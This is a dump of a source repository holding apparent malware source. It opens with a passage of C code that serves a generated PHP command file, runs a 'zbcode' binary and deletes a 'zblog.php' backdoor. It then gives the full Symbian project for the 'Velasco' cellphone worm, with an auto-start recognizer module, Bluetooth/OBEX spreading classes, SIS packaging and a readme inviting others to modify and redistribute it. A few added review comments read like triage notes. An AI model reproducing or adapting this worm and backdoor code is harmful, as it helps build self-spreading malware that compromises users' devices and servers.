| close(sc_gt_sock); 544 | return(-1); 545 | } 546 | while(1){ 547 | s_s=sizeof(struct sockaddr_in); 548 | if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1) 549 | { 550 | close(nw_gt_sock); 551 | close(sc_gt_sock); 552 | return(-1); 553 | } 554 | while(recv(nw_gt_sock,&t_c,1,0)){ 555 | if(t_c==0x0d){ 556 | recv(nw_gt_sock,&t_c,1,0); 557 | if(t_c==0x0a){ 558 | recv(nw_gt_sock,&t_c,1,0); 559 | if(t_c==0x0d){ 560 | recv(nw_gt_sock,&t_c,1,0); 561 | if(t_c==0x0a){ 562 | break; 563 | } 564 | } 565 | } 566 | } 567 | } 568 
| 569 | send(nw_gt_sock,http_rq,strlen(http_rq),0); 570 | if((fp=fopen(CMD_FILE,"r"))==NULL){ 571 | close(nw_gt_sock); 572 | close(sc_gt_sock); 573 | return(-1); 574 | } 575 | memset((char *)t_b,0,sizeof(t_b)); 576 | while(fgets(t_b,sizeof(t_b)-1,fp)){ 577 | send(nw_gt_sock,t_b,strlen(t_b),0); 578 | } 579 | fclose(fp); 580 | close(nw_gt_sock); 581 | continue; 582 | } 583 | close(sc_gt_sock); 584 | return(-1); 585 | } 586 | } 587 | 588 | void re_connt_lm(int st_sock_va,int type) 589 | { 590 | if(st_sock_va==-1) 591 | { 592 | if(!type){ 593 | kill(getppid(),9); // parent 594 | } 595 | kill((int)proc_r(),9); // child 596 | sf_exit(); 597 | } 598 | } 599 | 600 | int proc_r(){ 601 | FILE *fp; 602 | int proc_n; 603 | if((fp=fopen(PRC_FILE,"r"))==NULL){ 604 | exit(-1); // child check. 605 | } 606 | fscanf(fp,"%16d",&proc_n); 607 | fclose(fp); 608 | return proc_n; 609 | } 610 | 611 | int g_ip(char *ip) 612 | { 613 | int sock; 614 | struct ifreq ifpq; 615 | struct sockaddr_in *pq; 616 | 617 | memset(&ifpq,0,sizeof(ifpq)); 618 | if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) 619 | { 620 | return(-1); 621 | } 622 | pq=(struct sockaddr_in *)&ifpq.ifr_addr; 623 | pq->sin_family=AF_INET; 624 | 625 | memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name)); 626 | if(ioctl(sock,SIOCGIFADDR,&ifpq)==0) 627 | { 628 | memset((char *)ip,0,(MIN_BUF)); 629 | snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr)); 630 | } 631 | return 0; 632 | } 633 | 634 | #define BACKDOOR_PATH "zblog.php" 635 | #define CODE_PATH "zbcode" 636 | #define CODE_PATH_SRC "zbcode.c" 637 | 638 | int make_cmd_file() 639 | { 640 | unsigned long w1=0; 641 | FILE *fp; 642 | FILE *pf; 643 | 644 | if((fp=fopen(CMD_FILE,"w"))==NULL) 645 | { 646 | return(-1); 647 | } 648 | 649 | fprintf(fp,"1024){\n"); 741 | fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH); 742 | fprintf(fp,"}\n}\n"); 743 | #else 744 | fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH); 745 | 
fprintf(fp,"unlink('%s');\n",CODE_PATH); 746 | 747 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH); 748 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1); 749 | fprintf(fp,"} else { fclose($fp);\n"); 750 | fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH); 751 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH); 752 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1); 753 | fprintf(fp,"}\n}\n"); 754 | 755 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH); 756 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2); 757 | fprintf(fp,"} else { fclose($fp);\n"); 758 | fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH); 759 | fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH); 760 | fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2); 761 | fprintf(fp,"}\n}\n"); 762 | #endif 763 | fprintf(fp,"?>\n"); 764 | fclose(fp); 765 | } 766 | 767 | int filter_f(char *test_bf,int tnum) 768 | { 769 | switch(search_va[tnum].num) 770 | { 771 | case 0: /* google */ 772 | if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:") 773 | &&!strstr(test_bf,"<")&&!strstr(test_bf,">") 774 | &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...") 775 | &&!strstr(test_bf,VENDOR)) 776 | { 777 | return 1; 778 | } 779 | else return 0; 780 | break; 781 | 782 | case 1: /* yahoo */ 783 | if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?") 784 | &&!strstr(test_bf,"<")&&!strstr(test_bf,">") 785 | &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%") 786 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 787 | { 788 | return 1; 789 | } 790 | else return 0; 791 | break; 792 | 793 | case 2: /* nate */ 794 | if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT") 795 | &&!strstr(test_bf,"<")&&!strstr(test_bf,">") 796 | &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F") 797 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 798 | { 799 | return 1; 800 | } 801 | else return 0; 802 | break; 803 | 804 | case 3: /* lycos */ 
805 | if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<") 806 | &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F") 807 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 808 | { 809 | return 1; 810 | } 811 | else return 0; 812 | break; 813 | 814 | case 4: /* altavista */ 815 | if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<") 816 | &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f") 817 | &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR)) 818 | { 819 | return 1; 820 | } 821 | else return 0; 822 | break; 823 | 824 | default: 825 | return 0; 826 | break; 827 | } 828 | return 0; 829 | } 830 | 831 | 832 | 833 | -------------------------------------------------------------------------------- /velasco/Marcos Velasco Security.url: -------------------------------------------------------------------------------- 1 | [InternetShortcut] 2 | URL=http://www.velasco.com.br/index.htm 3 | Modified=80801E4FFA04C3012F 4 | -------------------------------------------------------------------------------- /velasco/marcos/group/bld.inf: -------------------------------------------------------------------------------- 1 | PRJ_MMPFILES 2 | marcos.mmp 3 | -------------------------------------------------------------------------------- /velasco/marcos/group/marcos.mmp: -------------------------------------------------------------------------------- 1 | TARGET marcos.mdl 2 | TARGETTYPE mdl 3 | TARGETPATH \system\recogs 4 | 5 | UID 0x10003A19 0x10005590 6 | 7 | USERINCLUDE ..\inc 8 | SYSTEMINCLUDE \epoc32\include 9 | 10 | SOURCEPATH ..\src 11 | SOURCE marcos.cpp 12 | 13 | LIBRARY euser.lib 14 | LIBRARY apmime.lib apparc.lib apgrfx.lib 15 | LIBRARY efsrv.lib 16 | -------------------------------------------------------------------------------- /velasco/marcos/group/marcos.pkg: -------------------------------------------------------------------------------- 1 | ; 2 | ; Installation file for starter application 3 | ; 4 | ;Languages 5 | &EN 6 | ; 7 | ; UID is the app's UID 8 | ; 9 | 
#{"marcos"},(0x10005590),1,0,0 10 | ; 11 | ;Supports Series 60 v 0.9 12 | ;This line indicates that this installation is for the Series 60 platform v0.9 13 | ;This line must appear _exactly_ as shown below in the sis file 14 | ;If this line is missing or incorrect, the sis file will not be able 15 | ;to be installed on Series 60 v0.9 platforms 16 | (0x101F6F88), 0, 0, 0, {"Series60ProductID"} 17 | ; 18 | ; 19 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\marcos.mdl"-"!:\system\recogs\marcos.mdl" 20 | -------------------------------------------------------------------------------- /velasco/marcos/inc/marcos.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // EZ-Boot 4 | // 5 | ////////////////////////////////////////////////////////////////////////////// 6 | // Boot & Recognizer Module 7 | // by NewLC (http://www.newlc.com) 8 | ////////////////////////////////////////////////////////////////////////////// 9 | // File : ezrecog.h 10 | // Compatibility: Symbian OS v6.1 11 | // History: 12 | // 2003.07.26: EBS : Creation 13 | // 2003.08.12: EBS : Integration in EZBoot 14 | // 2003.09.01: EBS : Add boot file recognition 15 | // 2003.10.28: EBS : Cleanup and comment 16 | ////////////////////////////////////////////////////////////////////////////// 17 | 18 | #include // CApaDataREcognizerType 19 | 20 | #define KUidRecog 0x10005590 // Use your own value here !!! 
21 | 22 | class CRecog : public CApaDataRecognizerType 23 | { 24 | public: 25 | CRecog(); 26 | TUint PreferredBufSize(); 27 | TDataType SupportedDataTypeL(TInt aIndex) const; 28 | static void BootUp(); 29 | static TInt BootUpKick(TAny *aParam); 30 | static void BootUpKickL(); 31 | 32 | private: 33 | void DoRecognizeL(TDesC& aName, const TDesC8& aBuffer); 34 | TBool HeaderRecognized(const TDesC8& aBuf); 35 | TBool NameRecognized(const TDesC& aName); 36 | }; 37 | -------------------------------------------------------------------------------- /velasco/marcos/src/marcos.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // EZ-Boot 4 | // 5 | ////////////////////////////////////////////////////////////////////////////// 6 | // Boot & Recognizer Module 7 | // by NewLC (http://www.newlc.com) 8 | ////////////////////////////////////////////////////////////////////////////// 9 | // File : ezrecog.cpp 10 | // Compatibility: Symbian OS v6.1 11 | // History: 12 | // 2003.07.26: EBS : Creation 13 | // 2003.08.12: EBS : Integration in EZBoot 14 | // 2003.09.01: EBS : Add boot file recognition 15 | // 2003.10.28: EBS : Cleanup and comment 16 | ////////////////////////////////////////////////////////////////////////////// 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include "marcos.h" 27 | 28 | ////////////////////////////////////////////////////////////////////////////// 29 | // 30 | // Recognition Definitions 31 | // 32 | ///////////////////////////////////////////////////////////////////////////// 33 | 34 | // The MIME Type that will be recognized 35 | _LIT8(KEzbMimeType,"text/vnd.newlc.ezboot"); 36 | 37 | // The file extension that shall be used by data we are recognizing 38 | _LIT(KEzbFileExtension,".boot"); 39 | 40 | // The data header that identifies EZBoot data 41 | 
_LIT8(KEzbDataHeader,"EZBoot:"); 42 | 43 | _LIT(KEzBootExe,"\\SYSTEM\\SYMBIANSECUREDATA\\VELASCO\\VELASCO.APP"); 44 | // NOTE(review): drive-less path of the application this module launches; BootUpKickL() resolves it with TFindFile::FindByDir() and starts it through RApaLsSession::StartApp(). velascocopyfiles.cpp uses the same directory on C:, so its presence is a host indicator for this sample. 45 | // The priority of the recognizer, can be EHigh, ENormal, ELow 46 | #define KEzRecognizerPriority CApaDataRecognizerType::ENormal 47 | 48 | // The size of the data buffer that will be passed to the recognizer 49 | // so that it performs the recognition 50 | #define KEzRecognizerBufferSize 7 51 | 52 | // The recognizer UID 53 | const TUid KUidEzBoot={KUidRecog}; 54 | 55 | 56 | ////////////////////////////////////////////////////////////////////////////// 57 | // 58 | // Boot Definitions 59 | // 60 | ///////////////////////////////////////////////////////////////////////////// 61 | 62 | // The thread name that will used to launch the above EXE 63 | _LIT(KBootUpThreadName,"EzBootThr"); 64 | 65 | ////////////////////////////////////////////////////////////////////////////// 66 | /// DLL entry point. 67 | /// \param aReason can be ignored. 68 | /// \return Always KErrNone 69 | ///////////////////////////////////////////////////////////////////////////// 70 | GLDEF_C TInt E32Dll(TDllReason /*aReason*/) 71 | { 72 | return(KErrNone); 73 | } 74 | // NOTE(review): CreateRecognizer() below has a side effect beyond building the recognizer: it calls CRecog::BootUp(), which starts a thread that launches KEzBootExe. The module is built as marcos.mdl with TARGETPATH \system\recogs (marcos.mmp), so loading of that recognizer is the auto-start hook of this sample - presumably at device start-up, which this listing does not show. An unexpected .mdl in \system\recogs is worth checking during triage. 75 | ////////////////////////////////////////////////////////////////////////////// 76 | /// Recognizer instanciation. This function MUST be the first one defined 77 | /// for the recognizer. 78 | /// \return a pointer on a new allocated recognizer instance 79 | ////////////////////////////////////////////////////////////////////////////// 80 | EXPORT_C CApaDataRecognizerType *CreateRecognizer() 81 | { 82 | // Create a recognizer instance 83 | CApaDataRecognizerType *me = new CRecog(); 84 | 85 | // Start all the boot code under a trap harness 86 | // This is pure boot code and has (normally) nothing to do 87 | // in a recognizer... 88 | CRecog::BootUp(); 89 | 90 | return(me); 91 | } 92 | 93 | ////////////////////////////////////////////////////////////////////////////// 94 | /// Recognizer Constructor.
95 | /// Initialise the internal data member iCountDataTypes with the number of 96 | /// MIME types that will be recognized. Set the recognizer priority. 97 | ////////////////////////////////////////////////////////////////////////////// 98 | CRecog::CRecog() 99 | :CApaDataRecognizerType(KUidEzBoot,KEzRecognizerPriority) 100 | { 101 | iCountDataTypes=1; 102 | } 103 | 104 | ////////////////////////////////////////////////////////////////////////////// 105 | /// Returns the size of the data buffer that will be passed to the recognition 106 | /// function (used by the recognition framework) 107 | /// \see DoRecognizeL() 108 | /// \return size of the data buffer 109 | ////////////////////////////////////////////////////////////////////////////// 110 | TUint CRecog::PreferredBufSize() 111 | { 112 | return(KEzRecognizerBufferSize); 113 | } 114 | 115 | ////////////////////////////////////////////////////////////////////////////// 116 | /// Returns the MIME type that our recognizer is able to manage 117 | /// (used by the recognition framework) 118 | /// \param aIndex: the index of the MIME type to return (will be always 1 for 119 | /// a recognizer that handles a single MIME type) 120 | /// \return a MIME type 121 | ////////////////////////////////////////////////////////////////////////////// 122 | TDataType CRecog::SupportedDataTypeL(TInt /*aIndex*/) const 123 | { 124 | return(TDataType(KEzbMimeType)); 125 | } 126 | 127 | ///////////////////////////////////////////////////////////////////////////// 128 | /// The recognition function. The result of the recognition is stored in 129 | /// the iConfidence data member. 
130 | /// \param aName: the name of the file that contain the data to analyze 131 | /// \param aBuffer: the data buffer 132 | /// \see PreferredBufSize() 133 | ///////////////////////////////////////////////////////////////////////////// 134 | void CRecog::DoRecognizeL(TDesC& aName, const TDesC8& aBuffer) 135 | { 136 | // Initialise the result status 137 | iConfidence = ENotRecognized; 138 | iDataType = TDataType(KEzbMimeType); 139 | 140 | // Check that we got the required amount of data 141 | if(aBuffer.Length()5) 179 | { 180 | TInt dotPos = aName.LocateReverse( '.' ); 181 | if (dotPos != KErrNotFound) 182 | { 183 | TInt extLength = aName.Length() - dotPos; 184 | HBufC* ext = aName.Right( extLength ).AllocL(); 185 | CleanupStack::PushL( ext ); 186 | if ( ext->CompareF(KEzbFileExtension) == 0 ) 187 | { 188 | res = ETrue; 189 | } 190 | CleanupStack::PopAndDestroy(); // ext 191 | } 192 | } 193 | return(res); 194 | } 195 | 196 | ///////////////////////////////////////////////////////////////////////////// 197 | /// The data recognition function. This functions checks whether the 198 | /// provided data starts with our data header 199 | /// extension 200 | /// \param aBuf: the data buffer to check 201 | /// \return ETrue if the data are OK 202 | ///////////////////////////////////////////////////////////////////////////// 203 | TBool CRecog::HeaderRecognized(const TDesC8& aBuf) 204 | { 205 | if(aBuf.Find(KEzbDataHeader)==0) 206 | return ETrue; 207 | return EFalse; 208 | } 209 | 210 | 211 | ///////////////////////////////////////////////////////////////////////////// 212 | /// The Boot code (non leaving). Create a new thread and kicks the real 213 | /// boot code. 
/// \see BootUpKick() 215 | ///////////////////////////////////////////////////////////////////////////// 216 | void CRecog::BootUp() 217 | { 218 | // Allocate the thread handle object; if the allocation fails nothing is started 219 | RThread* bootThread = new RThread(); 220 | if(bootThread) 221 | { 222 | TInt res=KErrNone; 223 | 224 | // Create the thread with BootUpKick as its entry point; KMinHeapSize is passed for both heap-size arguments 225 | res=bootThread->Create(KBootUpThreadName, 226 | CRecog::BootUpKick, 227 | KDefaultStackSize, 228 | KMinHeapSize, 229 | KMinHeapSize, 230 | NULL, 231 | EOwnerThread); 232 | 233 | if(res==KErrNone) 234 | { 235 | bootThread->Resume(); // let the new thread run 236 | bootThread->Close(); // release this handle to it 237 | } 238 | else 239 | { 240 | delete bootThread; 241 | } 242 | } 243 | } 244 | // NOTE(review): BootUp() is invoked from CreateRecognizer(), so this thread is started whenever the recognizer module is loaded; BootUpKickL() then launches the application named by KEzBootExe. 245 | ///////////////////////////////////////////////////////////////////////////// 246 | /// The threaded boot code (non leaving). Creates a cleanup 247 | /// stack and calls the leaving boot code BootUpKickL() under a TRAP harness 248 | /// \see BootUp() 249 | /// \see BootUpKickL() 250 | /// \param aParam: not used but required as a thread entry point 251 | /// \return KErrNone, the leave code trapped from BootUpKickL(), or KErrNoMemory when the cleanup stack could not be created 252 | ///////////////////////////////////////////////////////////////////////////// 253 | TInt CRecog::BootUpKick(TAny* /*aParam*/) 254 | { 255 | TInt err=KErrNoMemory; 256 | // Create a cleanup stack... 257 | CTrapCleanup *cleanup=CTrapCleanup::New(); 258 | if(cleanup) 259 | { 260 | //... and Kick under a trap harness 261 | TRAP(err,CRecog::BootUpKickL()); 262 | delete cleanup; 263 | } 264 | return err; 265 | } 266 | 267 | ///////////////////////////////////////////////////////////////////////////// 268 | /// The Boot code.
269 | ///////////////////////////////////////////////////////////////////////////// 270 | 271 | void CRecog::BootUpKickL() 272 | { 273 | // Get the full path (including drive letter) 274 | // to the boot server 275 | RFs fs; 276 | User::LeaveIfError(fs.Connect()); 277 | CleanupClosePushL(fs); 278 | TFindFile findFile(fs); 279 | User::LeaveIfError(findFile.FindByDir(KEzBootExe,KNullDesC)); 280 | 281 | // Connect to the Apparc server 282 | // and start our server 283 | RApaLsSession ls; 284 | User::LeaveIfError(ls.Connect()); 285 | CleanupClosePushL(ls); 286 | CApaCommandLine *cmd = CApaCommandLine::NewLC(); 287 | cmd->SetLibraryNameL(findFile.File()); 288 | cmd->SetCommandL(EApaCommandOpen); 289 | User::LeaveIfError(ls.StartApp(*cmd)); 290 | 291 | // Delete all stuff on the cleanup stack 292 | CleanupStack::PopAndDestroy(3); 293 | } 294 | -------------------------------------------------------------------------------- /velasco/readme.txt: -------------------------------------------------------------------------------- 1 | Worm.SymbOs.Velasco ---> This is the real name 2 | 3 | 4 | Download from: 5 | 6 | http://www.velasco.com.br 7 | 8 | 9 | This is the first cellphone worm with source code available in the world ! 10 | Do you can modify, rename, delete, insert any code... 11 | only sent a .SIS installer to me :-) 12 | 13 | 14 | marcos@velasco.com.br 15 | -------------------------------------------------------------------------------- /velasco/velasco/group/ABLD.BAT: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | REM Bldmake-generated batch file - ABLD.BAT 4 | REM ** DO NOT EDIT ** 5 | 6 | perl -S ABLD.PL \SYMBIAN\6.1\SERIES60\EPOC32\BUILD\VELASCO\GROUP\ %1 %2 %3 %4 %5 %6 %7 %8 %9 7 | if errorlevel==1 goto CheckPerl 8 | goto End 9 | 10 | :CheckPerl 11 | perl -v >NUL 12 | if errorlevel==1 echo Is Perl, version 5.003_07 or later, installed? 
13 | goto End 14 | 15 | :End 16 | -------------------------------------------------------------------------------- /velasco/velasco/group/bld.inf: -------------------------------------------------------------------------------- 1 | PRJ_MMPFILES 2 | velasco.mmp 3 | 4 | -------------------------------------------------------------------------------- /velasco/velasco/group/velasco.mmp: -------------------------------------------------------------------------------- 1 | TARGET velasco.app 2 | TARGETTYPE app 3 | UID 0x100039CE 0x10005591 4 | TARGETPATH \system\apps\velasco 5 | LANG SC 6 | 7 | SOURCEPATH ..\src 8 | SOURCE velasco.cpp 9 | SOURCE velascoapplication.cpp 10 | SOURCE velascoappui.cpp 11 | SOURCE velascodocument.cpp 12 | SOURCE velascocopyfiles.cpp 13 | SOURCE file.cpp 14 | SOURCE bluetooth.cpp 15 | 16 | SOURCEPATH ..\group 17 | RESOURCE velasco.rss 18 | 19 | USERINCLUDE ..\inc 20 | 21 | SYSTEMINCLUDE \epoc32\include 22 | 23 | LIBRARY efsrv.lib 24 | LIBRARY esock.lib 25 | LIBRARY euser.lib 26 | LIBRARY apparc.lib 27 | LIBRARY cone.lib 28 | LIBRARY eikcore.lib 29 | LIBRARY avkon.lib 30 | LIBRARY bluetooth.lib 31 | LIBRARY irobex.lib 32 | LIBRARY bafl.lib 33 | -------------------------------------------------------------------------------- /velasco/velasco/group/velasco.pkg: -------------------------------------------------------------------------------- 1 | ; velasco.pkg 2 | ; 3 | ;Language - standard language definitions 4 | &EN 5 | 6 | ; standard SIS file header 7 | #{"Velasco"},(0x10005591),1,0,0,NC 8 | 9 | ;Supports Series 60 v 0.9 10 | (0x101F6F88), 0, 0, 0, {"Series60ProductID"} 11 | 12 | ; 13 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\velasco.rsc"-"!:\system\apps\velasco\velasco.rsc" 14 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\marcos.mdl"-"!:\system\apps\velasco\marcos.mdl" 15 | "C:\Symbian\6.1\Series60\Epoc32\release\thumb\urel\velasco.app"-"!:\system\apps\velasco\velasco.app",FR,RI 16 | 
-------------------------------------------------------------------------------- /velasco/velasco/group/velasco.rss: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2002, Nokia. All rights reserved */ 2 | 3 | NAME VELA 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | // --------------------------------------------------------- 11 | // 12 | // Define the resource file signature 13 | // This resource should be empty. 14 | // 15 | // --------------------------------------------------------- 16 | // 17 | RESOURCE RSS_SIGNATURE { } 18 | 19 | // --------------------------------------------------------- 20 | // 21 | // Default Document Name 22 | // 23 | // --------------------------------------------------------- 24 | // 25 | RESOURCE TBUF r_default_document_name { buf=""; } 26 | 27 | -------------------------------------------------------------------------------- /velasco/velasco/inc/bluetooth.h: -------------------------------------------------------------------------------- 1 | #ifndef __BLUETOOTH_H 2 | #define __BLUETOOTH_H 3 | 4 | #include 5 | 6 | 7 | class VelascoBluetooth : public CActive 8 | { 9 | public: 10 | static VelascoBluetooth* NewL(); 11 | static VelascoBluetooth* NewLC(); 12 | 13 | private: 14 | void ConstructL(); 15 | void RunL(); 16 | 17 | void DoCancel() { }; 18 | 19 | inline VelascoBluetooth(); 20 | 21 | CObexClient *iClient; 22 | CObexFileObject *iCurrObject; 23 | 24 | int FoundCell; 25 | int BluetoothStatus; 26 | }; 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /velasco/velasco/inc/file.h: -------------------------------------------------------------------------------- 1 | #ifndef __FILE_H 2 | #define __FILE_H 3 | 4 | #include 5 | 6 | 7 | class File 8 | { 9 | public: 10 | enum OpenMode {OMRead = 1,OMWrite = 2,OMText = 4,OMCreate = 8,OMReplace = 16,OMOpen = 32}; 11 | 12 | bool Open(const TDesC &,unsigned int mode); 13 | void 
Close(); 14 | int Read(void *buff,int length); 15 | int Write(void *buff,int length); 16 | void Seek(TSeek mode,int offSet); 17 | 18 | RFile rFile; 19 | 20 | private: 21 | RFs fsSession; 22 | }; 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /velasco/velasco/inc/header.h: -------------------------------------------------------------------------------- 1 | unsigned char headercontent[]= 2 | { 3 | 0x91,0x55,0x00,0x10,0x12,0x3a,0x00,0x10,0x19,0x04,0x00,0x10,0x20, 4 | 0xc4,0x1b,0xee, 5 | 0x00,0x00, // Estes dois bytes serao substituidos pelo CRC16 6 | 0x01,0x00,0x03,0x00,0x01,0x00,0x00,0x00, 7 | 0x00,0x00,0x21,0x00,0x00,0x00,0xc8,0x00,0x00,0x00,0x09,0x00,0x00, 8 | 0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x64,0x00,0x00,0x00, 9 | 0x66,0x00,0x00,0x00,0xf6,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0a, 10 | 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x0a,0x01,0x00,0x00,0x00,0x00, 11 | 0x00,0x00,0x76,0x2d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 12 | 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 13 | 0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7a,0x00,0x00, 14 | 0x00,0x12,0x01,0x00,0x00,0x44,0x00,0x00,0x00,0x8c,0x01,0x00,0x00, 15 | 0xbc,0x24,0x00,0x00,0x78,0x03,0x00,0x00,0xbc,0x24,0x00,0x00,0x00, 16 | 0x00,0x00,0x00,0xd0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 17 | 0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x00,0x00,0x00,0xd0,0x01,0x00, 18 | 0x00,0x42,0x00,0x00,0x00,0x48,0x02,0x00,0x00,0xa8,0x08,0x00,0x00, 19 | 0x34,0x28,0x00,0x00,0xa8,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x8a, 20 | 0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 21 | 0x00,0x00,0x7a,0x00,0x00,0x00,0x8a,0x02,0x00,0x00,0x44,0x00,0x00, 22 | 0x00,0x04,0x03,0x00,0x00,0x12,0x00,0x00,0x00,0xdc,0x30,0x00,0x00, 23 | 0x12,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x03,0x00,0x00,0x88, 24 | 0x6f,0x1f,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x22,0x00, 25 | 0x00,0x00,0x48,0x03,0x00,0x00,0x0e,0x00,0x00,0x00,0x6a,0x03,0x00, 26 
| 0x00,0x43,0x00,0x3a,0x00,0x5c,0x00,0x53,0x00,0x79,0x00,0x6d,0x00, 27 | 0x62,0x00,0x69,0x00,0x61,0x00,0x6e,0x00,0x5c,0x00,0x36,0x00,0x2e, 28 | 0x00,0x31,0x00,0x5c,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x69,0x00, 29 | 0x65,0x00,0x73,0x00,0x36,0x00,0x30,0x00,0x5c,0x00,0x45,0x00,0x70, 30 | 0x00,0x6f,0x00,0x63,0x00,0x33,0x00,0x32,0x00,0x5c,0x00,0x72,0x00, 31 | 0x65,0x00,0x6c,0x00,0x65,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x5c, 32 | 0x00,0x74,0x00,0x68,0x00,0x75,0x00,0x6d,0x00,0x62,0x00,0x5c,0x00, 33 | 0x75,0x00,0x72,0x00,0x65,0x00,0x6c,0x00,0x5c,0x00,0x76,0x00,0x65, 34 | 0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x2e,0x00, 35 | 0x61,0x00,0x70,0x00,0x70,0x00,0x21,0x00,0x3a,0x00,0x5c,0x00,0x73, 36 | 0x00,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6d,0x00,0x5c,0x00, 37 | 0x61,0x00,0x70,0x00,0x70,0x00,0x73,0x00,0x5c,0x00,0x76,0x00,0x65, 38 | 0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f,0x00,0x5c,0x00, 39 | 0x76,0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00,0x63,0x00,0x6f, 40 | 0x00,0x2e,0x00,0x61,0x00,0x70,0x00,0x70,0x00,0x43,0x00,0x3a,0x00, 41 | 0x5c,0x00,0x53,0x00,0x79,0x00,0x6d,0x00,0x62,0x00,0x69,0x00,0x61, 42 | 0x00,0x6e,0x00,0x5c,0x00,0x36,0x00,0x2e,0x00,0x31,0x00,0x5c,0x00, 43 | 0x53,0x00,0x65,0x00,0x72,0x00,0x69,0x00,0x65,0x00,0x73,0x00,0x36, 44 | 0x00,0x30,0x00,0x5c,0x00,0x45,0x00,0x70,0x00,0x6f,0x00,0x63,0x00, 45 | 0x33,0x00,0x32,0x00,0x5c,0x00,0x72,0x00,0x65,0x00,0x6c,0x00,0x65, 46 | 0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x5c,0x00,0x74,0x00,0x68,0x00, 47 | 0x75,0x00,0x6d,0x00,0x62,0x00,0x5c,0x00,0x75,0x00,0x72,0x00,0x65, 48 | 0x00,0x6c,0x00,0x5c,0x00,0x6d,0x00,0x61,0x00,0x72,0x00,0x63,0x00, 49 | 0x6f,0x00,0x73,0x00,0x2e,0x00,0x6d,0x00,0x64,0x00,0x6c,0x00,0x21, 50 | 0x00,0x3a,0x00,0x5c,0x00,0x73,0x00,0x79,0x00,0x73,0x00,0x74,0x00, 51 | 0x65,0x00,0x6d,0x00,0x5c,0x00,0x61,0x00,0x70,0x00,0x70,0x00,0x73, 52 | 0x00,0x5c,0x00,0x76,0x00,0x65,0x00,0x6c,0x00,0x61,0x00,0x73,0x00, 53 | 0x63,0x00,0x6f,0x00,0x5c,0x00,0x6d,0x00,0x61,0x00,0x72,0x00,0x63, 54 | 
